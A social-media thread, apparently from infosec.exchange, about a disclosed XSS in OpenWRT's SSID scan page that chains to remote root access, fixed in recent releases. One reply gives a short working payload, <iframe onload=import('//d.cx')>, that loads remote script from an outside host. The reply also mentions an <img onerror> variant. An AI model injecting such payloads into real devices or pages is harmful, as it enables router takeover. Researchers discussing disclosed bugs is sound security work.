@freddy @sash interesting… https://developer.mozilla.org/en-US/docs/Web/API/SVGElement/load_event claims it doesn’t work in Firefox and references a 15 year old bug… but yes, that would get a few more characters 
D
dgl@infosec.exchange
@dgl@infosec.exchange
Posts
-
Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1 -
Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1@sash this takes advantage of the fact (some?) browsers by default load a blank iframe, so it's fewer characters than <img src=x onerror=...>. Works in Chrome at least.
-
Rooting OpenWRT from the parking lot: I discovered an XSS in the OpenWRT SSID scan page, that can be chained to remote root access 👾Write-up and demo: https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/CVE-2026-32721, fixed in 24.10.6 / 25.12.1@sash very cool find! I think it would be possible to fit it (just) in 32 characters with: <iframe onload=import('//d.cx')>
(That url works; d.cx is serving a hello world alert payload at the moment, it works with e.g. https://d.cx/~dgl/l.html but I haven't tried actually doing it with OpenWRT.)